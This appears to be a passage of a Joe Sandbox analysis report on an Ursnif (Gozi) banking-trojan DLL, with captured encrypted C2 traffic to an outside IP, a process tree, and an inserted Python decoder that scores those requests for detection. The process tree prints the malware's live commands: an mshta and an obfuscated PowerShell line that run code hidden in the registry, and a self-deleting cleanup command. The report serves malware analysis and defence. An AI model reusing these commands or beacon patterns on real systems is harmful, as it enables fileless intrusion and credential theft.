eb 35 1a 00 45 db e4 31 ab 88 96 b0 ff 26 89 2d fc c8 31 1b 64 18 49 7a 9c 1f 31 8a 99 ed 74 76 f7 46 43 91 5f 2b e5 a4 4f 81 43 83 2f 2b f0 58 b3 e7 26 b1 48 31 fd 47 12 51 d2 9f 37 4a cb b3 44 f1 c1 1d 0d 0d c0 ed e1 ba b1 e7 f8 a4 7e 
d5 9b c0 fb cc 8e db fd 21 90 fa 1b 7c 17 b9 00 5a 3f 65 0c 07 23 c6 2d 31 69 87 ad 3d 0c d1 dc 5d 1b da 7a 19 1d e9 8f 0c 84 2d b7 76 f3 12 78 41 32 32 7c d9 b9 67 bd 09 af d5 eb 22 86 ce 7a eb 59 f5 4c fe 59 7e b5 5e 72 9c 41 b3 0d b0 61 27 61 69 ce 8f 3d e6 89 c1 3e 80 d4 bf 05 80 c9 5c 15 2e b0 d1 89 c8 1a 18 8b e9 a0 14 1f 38 52 13 2f 4e 97 88 34 65 1a 1c a3 c7 03 94 1c fd f5 00 d4 0c 66 1b ff bc 33 3a ea 99 93 06 2f a1 af 76 09 dd 35 58 e4 b5 16 87 6a f1 a5 f4 46 8e 6f 0e 91 42 b5 f9 90 ee 4b b8 55 38 76 ad 9e 59 2a 4f 47 b6 a1 a7 88 91 de 66 63 c5 1a c6 b9 f5 2d 71 e2 34 af db 56 7a 7e 08 b2 e1 3d 45 1e b1 d2 f4 be ff e0 ca 97 16 6d d7 ac fa 3d d9 dd 2b 98 8c 30 d8 d8 da f5 6f 43 2a c1 e2 39 58 57 5c f3 84 d2 8a fc 41 e8 b6 86 b5 d6 a9 cc 11 26 e2 5c 78 11 68 89 b8 d7 de 59 36 54 af e2 df ca 98 1e bc cf 75 02 7b 79 f6 a2 6e 13 90 b1 92 fc b3 ce a4 e2 34 91 55 9e fa 3b 0f 72 ab a2 4d 99 44 12 d5 e9 35 3f 40 50 46 79 d5 46 6d f3 1c db ef 73 2a 9e 2e a3 e6 41 21 e8 98 b1 58 a4 50 23 08 6f 7c 86 1c 56
                        Data Ascii: w#(_QeTKENi}Z[hl_u[:#CmM/KBP]H|wv#i,F96{x&4"n'D_$"['01C*+=aopfZ[{:oaD/QmFOf+F2khVKHUA))?p&N4@zxV]>0O\f>]Z#/])=mz>;UE*QMFz:o(~U.dC|Hz-D)iu-&!^Bk#xu50-\</#TO< F_QJh[S&Js^3NUwIK`F*%%<?pvZ3EF?[Ir%w>N!fyY-bsq AjjTrI'\5E1&-1dIz1tvFC_+OC/+X&H1GQ7JD~!|Z?e#-1i=]z-vxA22|g"zYLY~^rAa'ai=>\.8R/N4ef3:/v5XjFoBKU8vY*OGfc-q4Vz~=Em=+0oC*9XW\A&\xhY6Tu{yn4U;rMD5?@PFyFms*.A!XP#o|V
                        May 25, 2022 11:27:28.182548046 CEST  1696  OUT  GET /drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pB9pAoQo46tq53qB/yLUp2d5T9/j5s74YMStQa0vycAYVnz/i1_2BT1sbtGbsqmiKYJ/utxS2UAD48D_2FhKmTNhPj/C7HmcyJhh_2BI/RoK5qxzW/AONvbwwgZ6joXACVCUjXkBm/TrT5RUjDbT/JqnBRntI67DVKvl4U/zabjaRP4H3Fa/y7F2cIC4htT/NfLmrAWL7x6jSO/onSOjeHvFKi2HNfNhR_2F/KXsh6.jlk HTTP/1.1
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: 176.10.119.68
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        May 25, 2022 11:27:28.475930929 CEST  1698  IN  HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 25 May 2022 09:27:28 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 1870
                        Connection: keep-alive
                        Pragma: public
                        Accept-Ranges: bytes
                        Expires: 0
                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                        Content-Disposition: inline; filename="628df6806e3d7.bin"
                        Data Raw: 16 73 69 31 09 06 6d 67 f0 e8 32 67 f7 0a 83 93 06 b9 df f8 37 51 1c 9d 9c 07 14 8f dc 5f 0c a3 1b 40 e9 a6 4f 90 34 e9 29 61 44 14 68 59 01 07 9d 75 5f 14 0d 89 33 23 dc 16 33 c5 a1 b7 2a 2b 04 69 ac be 28 5a 15 ed 24 be 2e 0a d4 54 44 07 1c 3c a1 5f 82 95 2b ec 34 ec ff 8e 52 c3 14 cb 86 87 b4 22 9b 54 47 47 e2 b0 56 01 6f 6f ee 38 14 2f 39 e9 c3 5e b7 d2 86 a1 f7 28 2e 2b bc 8f 66 4a 99 ea 61 ce 3d eb 59 2b 32 ba 1f 6d 95 cd 1a 43 93 dd b1 e6 b8 a6 fe 00 03 2d 11 b4 6a 10 e7 19 e4 3f f5 bf 36 04 79 00 58 c4 d0 12 4c e0 35 90 db c0 87 eb 8a a8 93 2b a7 7c cf f0 68 31 3b 31 68 d3 d7 e9 64 1f 3e bf 79 bc 42 80 b8 c0 b0 c9 5a 23 dd 78 10 86 f8 30 44 87 ba 6c 75 5c d2 80 bd c3 14 03 9f 17 fd f7 f0 4a a6 4f da c2 53 be e6 99 70 40 bd a6 a1 d9 12 51 8e e9 8d 99 45 7b cd fd ba 10 b0 85 d3 0d cc 62 b0 82 02 8b d7 51 51 5c c7 7f 57 85 c7 1c 7d e8 4c c2 59 39 c7 f0 6d 72 2a 86 ef a4 4e c8 bc f0 c3 44 f1 e7 b7 d4 6a b1 c0 5d a0 f6 06 06 86 79 68 a0 04 75 95 68 64 35 a7 2b 10 c3 89 9b 92 05 4f a9 16 a1 6e a4 5b 65 f3 a0 d3 ee 2a 5f a7 a2 51 72 0f 3d 08 fe da b8 eb 54 5d 8b a1 4d af 3b ae a8 29 d1 fe 8f e8 ae b8 0e 78 84 1e f4 78 5d 35 39 2d 2b 9d a4 cd 46 ae a1 68 ea 17 21 0c 5b 39 91 53 97 61 5d af 25 af 50 60 48 02 fa 0d 74 fa de 26 e9 9b 15 5f 12 6c bd 24 fe 44 c8 bc 86 b6 34 a6 35 f5 52 c2 e9 d1 ca af 12 31 9a 6b aa a0 7a 79 95 b6 1e 8b 83 29 b7 b2 85 18 5d 31 3c 0b 29 f4 1c ea a0 d9 d9 84 d3 c5 4a 7f 11 44 20 e2 1e c4 27 8d 17 5a 5f a1 e8 1e cb 8f ab 3f a9 9e 2f dd 48 35 0b 41 9e 48 8a 4c 9b 15 1a d4 43 66 80 ca 89 34 a5 de b0 d5 fb 6c 45 30 ee 1b 22 3f 5e 42 ff 82 a5 97 e5 c5 d5 41 6e 55 ff f7 70 a9 ae da 49 ed fb c3 40 18 37 db 1e 14 0b 72 0c ca 7e 17 bc 5f ab ab 3f 50 8f 71 10 b8 94 56 5a 37 6e 4b 94 31 8c aa 32 dc c2 5a d1 67 8d 1c b4 f9 8b 51 e2 c2 3c 19 8b c5 ff 49 28 68 17 97 6e 26 73 0e 2b 97 a3 4d 77 5a 3e 92 19 b3 d7 5c a1 ec e4 cb 05 30 73 ee 02 04 30 fa e3 6e 87 78 20 2d c1 4a 06 0e 8e e6 fc 00 08 5e e2 a7 fe 72 4c d2 b7 4a 
82 1e 37 d3 b4 6a ae b7 d0 27 2a 31 c9 22 03 9e f0 6d a1 8c f9 47 3e f2 d8 98 93 bb 3c 16 ae f6 25 f2 9b 91 e3 dc 57 df 9d cf a5 28 4f 75 c7 a7 c4 81 2f fc 7f 4a a1 df 87 68 bc f7 66 c1 2c 48 91 ce 0e 96 f9 68 1f a5 66 36 3b 39 14 02 be 06 aa aa b6 60 70 d6 fe 13 eb 16 ca 2f 1c 81 b6 e2 1d 04 1e 2e 53 4c 94 46 f8 56 ed 5e fd 3d 48 cd 87 b7 04 0a 31 b5 9e 3a f4 e8 45 30 8b fd 23 a4 01 8a 20 6a ae 83 02 f6 26 81 38 97 69 db 72 e2 83 c8 13 a4 38 f3 04 bb f6 53 a7 62 04 1d ed 09 6b 32 6e ec 8a 2c 93 81 78 90 73 16 0d 4e e5 b0 98 c1 33 fd 26 a6 07 7d e5 72 41 30 5c 00 ff 8a b7 2f 96 71 b6 f9 7b 8f 67 7d a1 cd ed 16 4d 16 cc a1 d6 9f c2 08 5b 62 ed c9 01 1a 4a 0b 71 72 be 28 be eb 5d ea 9b 23 60 bb 90 51 33 ea 0f e3 f6 5c 11 d0 4e 7f f2 69 49 8f 45 fa 88 86 36 3d 00 f8 ca 46 9c 18 c5 e3 38 2a a5 b4 04 f4 66 f6 29 cb ce 7b 91 f1 cd a4 e3 14 4f 52 ac 7f 45 d7 4b c5 58 40 43 98 c4 44 6e 78 13 b7 d8 84 35 8e 32 af b6 ff b0 78 97 60 91 1b 75 84 fd d8 4c d2 b2 32 2c 87 b3 18 e3 fc 42 2c 52 90 26 be 18 ba 3b 3c cd e8 f2 d1
                        Data Ascii: si1mg2g7Q_@O4)aDhYu_3#3*+i(Z$.TD<_+4R"TGGVoo8/9^(.+fJa=Y+2mC-j?6yXL5+|h1;1hd>yBZ#x0Dlu\JOSp@QE{bQQ\W}LY9mr*NDj]yhuhd5+On[e*_Qr=T]M;)xx]59-+Fh![9Sa]%P`Ht&_l$D45R1kzy)]1<)JD 'Z_?/H5AHLCf4lE0"?^BAnUpI@7r~_?PqVZ7nK12ZgQ<I(hn&s+MwZ>\0s0nx -J^rLJ7j'*1"mG><%W(Ou/Jhf,Hhf6;9`p/.SLFV^=H1:E0# j&8ir8Sbk2n,xsN3&}rA0\/q{g}M[bJqr(]#`Q3\NiIE6=F8*f){OREKX@CDnx52x`uL2,B,R&;<
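The three requests in this session share one shape: a fixed /drew/ directory, a long run of random-length path segments, _2F and _2B where a base64 string would carry / and +, a .jlk extension, and a User-Agent claiming MSIE 8.0 on Windows NT 10.0, a browser that was never shipped for that OS. The server answers each with an octet-stream whose Content-Disposition filename is 13 hex digits, and the first 8 digits of each name (628df67e, 628df67f, 628df680) are the Unix time of the matching Date header, which is the layout PHP's uniqid() produces. The following Python is an added example, not part of the Joe Sandbox report: it undoes the path encoding, scores a request against those indicators, and reads the timestamp out of the filename. Two assumptions are not stated on the page: every _XX token is treated as the byte that %XX would denote (the capture only shows _2F and _2B), and the uniqid() reading of the filenames is an inference checked against the Date headers. The sample requests are copied from the capture above; the decoder returns the still-encrypted payload, since no key is on this page.

```python
"""Added example (not part of the Joe Sandbox report): decode and score the
Ursnif/Gozi HTTP requests captured above.

Assumptions not stated on the page: every '_XX' in the path stands for the
byte that '%XX' would denote (only _2F and _2B occur in this capture), and the
13-hex-digit download names follow PHP's uniqid() layout (8 hex digits of Unix
seconds followed by 5 hex digits of microseconds).
"""
import base64
import re
from datetime import datetime, timezone

# Request targets copied verbatim from the capture above (constructed input).
PATH_1 = "/drew/ELiX5C1LBrOXGVb_2F7VT_2/F3y7AZYCgC/OAzMBADjwIAAgevJ7/Ln8DdTMzAOtI/oaRRlHeZd85/z64fb0RLSddtHF/rHMZD1_2FqMPdbWOBNRMe/v9EppSM4NhIsm8SQ/XAUtOy4sCW68iNX/Cmaw_2Ff5hh5_2FyXv/eA_2Fri4K/swu3zwi7P_2FcYbL_2Bx/W02PomqcfEjRbitbvf6/IXpVMOx_2BSCAzr10HE5Rp/jnPQORhN2og07/6kVbs5lO/NwTvbwc1Won8BiTcK1YZBEd/L7l.jlk"
PATH_2 = "/drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftco/TjSDtFakSde/soGhjhBV5Tb5mX/q7nM_2FDyGsXlD3E3A4fe/_2ByGCIGrgekC2k4/_2BIghzEoEtICMG/eMdl_2FVYz1Gzr3rXb/6bQxvF882/0gJazcAIQC6vmyI4DEnR/k0LRXXmFX8YlpSLVUNq/6DaeywiN2GwHaJFGl8Ik7G/m9UBKgfO4ybSV/fnhYeS0x/hab1JQvgZCtDWyU/A.jlk"
PATH_3 = "/drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pB9pAoQo46tq53qB/yLUp2d5T9/j5s74YMStQa0vycAYVnz/i1_2BT1sbtGbsqmiKYJ/utxS2UAD48D_2FhKmTNhPj/C7HmcyJhh_2BI/RoK5qxzW/AONvbwwgZ6joXACVCUjXkBm/TrT5RUjDbT/JqnBRntI67DVKvl4U/zabjaRP4H3Fa/y7F2cIC4htT/NfLmrAWL7x6jSO/onSOjeHvFKi2HNfNhR_2F/KXsh6.jlk"

# User-Agent seen in the capture; IE8 was never released for Windows 10.
UA_SEEN = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)"
IMPOSSIBLE_UA = "MSIE 8.0; Windows NT 10.0"


def make_request(path, ua=UA_SEEN, host="176.10.119.68"):
    """Rebuild a request in the form shown in the report."""
    return (f"GET {path} HTTP/1.1\r\nUser-Agent: {ua}\r\nHost: {host}\r\n"
            "Connection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n")


SAMPLE_REQUESTS = [make_request(p) for p in (PATH_1, PATH_2, PATH_3)]

_ESCAPE = re.compile(r"_([0-9A-Fa-f]{2})")


def decode_gozi_path(path, prefix="/drew/"):
    """Undo the path encoding: drop the campaign directory and the fake
    extension, join the randomly split segments, turn each _XX back into the
    character %XX would denote (_2F -> '/', _2B -> '+'), restore the base64
    padding that was stripped, and decode. The result is still ciphertext;
    no key is available here."""
    if not path.startswith(prefix):
        raise ValueError(f"path does not start with {prefix!r}")
    body = path[len(prefix):].rsplit(".", 1)[0].replace("/", "")
    b64 = _ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), body)
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64, validate=True)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, target and lower-cased headers."""
    lines = raw.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": target, "headers": headers}


def ursnif_indicators(raw, prefix="/drew/"):
    """Return the traits of this request that match the pattern in the capture.
    An empty list means nothing matched."""
    req = parse_request(raw)
    path = req["path"]
    hits = []
    if IMPOSSIBLE_UA in req["headers"].get("user-agent", ""):
        hits.append("user-agent claims IE8 on Windows 10")
    if "_2F" in path or "_2B" in path:
        hits.append("underscore-escaped base64 in path")
    if path.count("/") >= 10 and len(path) > 200:
        hits.append("long path made of many short random segments")
    if path.startswith(prefix):
        try:
            blob = decode_gozi_path(path, prefix)
        except ValueError:
            blob = b""
        if blob and len(blob) % 16 == 0:
            hits.append(f"path decodes to {len(blob)} bytes, a block-cipher multiple")
    return hits


def uniqid_timestamp(filename):
    """Read the time out of a uniqid()-shaped name such as 628df67e5f6a8.bin."""
    stem = filename.split(".")[0]
    if not re.fullmatch(r"[0-9a-f]{13}", stem):
        raise ValueError("not a 13-hex-digit uniqid() name")
    secs, usec = int(stem[:8], 16), int(stem[8:], 16)
    if usec >= 1_000_000:
        raise ValueError("microsecond field out of range")
    return datetime.fromtimestamp(secs, tz=timezone.utc).replace(microsecond=usec)


if __name__ == "__main__":
    names = ("628df67e5f6a8.bin", "628df67f44836.bin", "628df6806e3d7.bin")
    for req, name in zip(SAMPLE_REQUESTS, names):
        print(ursnif_indicators(req))
        print(name, "->", uniqid_timestamp(name).isoformat())
```

Run against the three captured requests, the decoder returns 192, 192 and 208 bytes, each a multiple of 16, which is what a block-cipher output wrapped in base64 looks like; a plain browser request produces no indicators. The decoded timestamps (09:27:26, 09:27:27 and 09:27:28 UTC) line up with the three Date headers, so the download names are generated per request on the server and carry no client identifier.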


                        Target ID:0
                        Start time:11:26:33
                        Start date:25/05/2022
                        Path:C:\Windows\System32\loaddll32.exe
                        Wow64 process (32bit):true
                        Commandline:loaddll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll"
                        Imagebase:0xc10000
                        File size:116736 bytes
                        MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:1
                        Start time:11:26:33
                        Start date:25/05/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll",#1
                        Imagebase:0x1190000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:3
                        Start time:11:26:34
                        Start date:25/05/2022
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll",#1
                        Imagebase:0x1020000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.324102664.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.323570193.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.505479603.0000000004B79000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.375616313.000000000509C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.323251316.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.508865065.0000000004F1F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.373340776.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322813142.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.324135232.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.322932603.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.370749098.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.323857679.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.323438533.0000000005298000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.373077205.000000000519A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.373165051.0000000005219000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high

                        Target ID:4
                        Start time:11:26:35
                        Start date:25/05/2022
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 272
                        Imagebase:0xb70000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:6
                        Start time:11:26:41
                        Start date:25/05/2022
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 408
                        Imagebase:0xb70000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:8
                        Start time:11:26:46
                        Start date:25/05/2022
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 436
                        Imagebase:0xb70000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:24
                        Start time:11:27:34
                        Start date:25/05/2022
                        Path:C:\Windows\System32\mshta.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cwbm='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cwbm).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                        Imagebase:0x7ff6c1160000
                        File size:14848 bytes
                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:25
                        Start time:11:27:37
                        Start date:25/05/2022
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; famnsyvweq ([System.Text.Encoding]::ASCII.GetString((asytsrjo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                        Imagebase:0x7ff6ba650000
                        File size:447488 bytes
                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high

                        Target ID:26
                        Start time:11:27:38
                        Start date:25/05/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff647620000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:28
                        Start time:11:27:52
                        Start date:25/05/2022
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.cmdline
                        Imagebase:0x7ff6fcb60000
                        File size:2739304 bytes
                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        Target ID:29
                        Start time:11:27:55
                        Start date:25/05/2022
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBB61.tmp" "c:\Users\user\AppData\Local\Temp\rn2v1u0v\CSCE8729092494447E68BAFD2B3DE7C4FE.TMP"
                        Imagebase:0x7ff7a1d50000
                        File size:47280 bytes
                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:30
                        Start time:11:27:55
                        Start date:25/05/2022
                        Path:C:\Windows\System32\control.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\control.exe -h
                        Imagebase:0x7ff620e10000
                        File size:117760 bytes
                        MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001E.00000000.449708876.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001E.00000000.447845466.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001E.00000000.446537800.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                        Target ID:32
                        Start time:11:28:01
                        Start date:25/05/2022
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.cmdline
                        Imagebase:0x7ff6fcb60000
                        File size:2739304 bytes
                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET

                        Target ID:33
                        Start time:11:28:04
                        Start date:25/05/2022
                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDBAB.tmp" "c:\Users\user\AppData\Local\Temp\0rxpcrxp\CSC81748258BEC6426288BE9680C960B04E.TMP"
                        Imagebase:0x7ff7a1d50000
                        File size:47280 bytes
                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:34
                        Start time:11:28:09
                        Start date:25/05/2022
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Explorer.EXE
                        Imagebase:0x7ff6f3b00000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:38
                        Start time:11:28:24
                        Start date:25/05/2022
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\zs5n5sI6N2.dll
                        Imagebase:0x7ff7bb450000
                        File size:273920 bytes
                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:39
                        Start time:11:28:29
                        Start date:25/05/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff647620000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:40
                        Start time:11:28:31
                        Start date:25/05/2022
                        Path:C:\Windows\System32\PING.EXE
                        Wow64 process (32bit):false
                        Commandline:ping localhost -n 5
                        Imagebase:0x7ff7532f0000
                        File size:21504 bytes
                        MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:41
                        Start time:11:28:43
                        Start date:25/05/2022
                        Path:C:\Windows\System32\RuntimeBroker.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                        Imagebase:0x7ff6b45b0000
                        File size:99272 bytes
                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
